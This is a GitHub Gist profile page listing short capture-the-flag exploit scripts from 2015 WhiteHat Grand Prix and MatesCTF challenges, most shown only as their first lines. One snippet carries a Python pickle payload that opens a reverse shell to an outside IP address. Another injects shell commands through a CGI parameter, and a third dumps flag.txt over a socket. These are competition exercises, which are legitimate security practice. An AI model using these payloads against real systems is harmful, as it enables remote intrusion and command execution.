Skip to content

Instantly share code, notes, and snippets.

View peternguyen93's full-sized avatar

Peter Nguyen peternguyen93

69 followers · 4 following
View GitHub Profile
@peternguyen93
peternguyen93 / matesctf.092015.re500.py
Created October 2, 2015 08:10 — forked from yeuchimse/matesctf.092015.re500.py
__author__ = 'yeuchimse'
import struct
FileMode = ['rb', 'wb', 'ab', 'r+b', 'w+b', 'a+b']
Registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'esp', 'ebp']
# region ...
def format_code(v):
@peternguyen93
peternguyen93 / Whitehat_2015_pwn200.py
Created October 28, 2015 02:40
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
# p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337)
# p = Pwn(port=1337)
def exploit():
cmd = 'cat flag.txt >&4;ls -lia >&4;'
@peternguyen93
peternguyen93 / Whitehat_2015_pwn300.py
Created October 28, 2015 02:48
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
from capstone import *
p = Pwn(host='lab8.grandprix.whitehatvn.com',port=1337)
def xor(msg):
@peternguyen93
peternguyen93 / Whitehat_2015_pwn500.py
Created October 28, 2015 02:51
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
def exploit():
# raw_input('Debug>')
while 1:
@peternguyen93
peternguyen93 / Whitehat_2015_web100.py
Created October 28, 2015 02:55
import urllib, urllib2
import string
import socket
url = 'http://lab5b.grandprix.whitehatvn.com/cgi-bin/web13377331.py?input=0x1337'
flag = ''
regex_fail = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyX'
i = 1
charset = string.letters + string.digits + '_'
while 1:
@peternguyen93
peternguyen93 / Whitehat_2015_web200.py
Created October 28, 2015 02:57
import urllib, urllib2
import pickle
url = 'http://lab13.grandprix.whitehatvn.com/b3acec105de421e136aad4024ee45b63.php?data='
shell = "cos\nsystem\n(S'bash -i >& /dev/tcp/128.199.171.28/8081 0>&1'\ntR."
tmp = url + urllib.quote_plus(shell)
req = urllib2.urlopen(tmp)
@peternguyen93
peternguyen93 / Whitehat_2015_web300.py
Created October 28, 2015 03:01
import requests
cmd ='printf "%s|" /*'
# cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3'
for i in xrange(400):
a = requests.get('http://lab4b.grandprix.whitehatvn.com/cgi-bin/counter?hit=`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;')
print chr(int(a.text.split(" ")[1].split("}")[0])),
'''
for fd in xrange(100):
@peternguyen93
peternguyen93 / matesctf_round2_fruit.py
Created November 29, 2015 05:29
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
p = Pwn(mode = 1,host='lab02.matesctf.org',port=4231)
# p = Pwn(mode=1)
def exploit():
p.connect()
@peternguyen93
peternguyen93 / matesctf_round2_fruit2.py
Created November 29, 2015 05:29
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
p = Pwn(mode = 1,host='lab03.matesctf.org',port=4321)
# p = Pwn(mode=1)
def exploit():
p.connect()
@peternguyen93
peternguyen93 / matectf_round2_login_server.py
Created November 29, 2015 05:30
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
p = Pwn(host='lab01.matesctf.org',port=4001)
def login(buf):
p.read_until('>')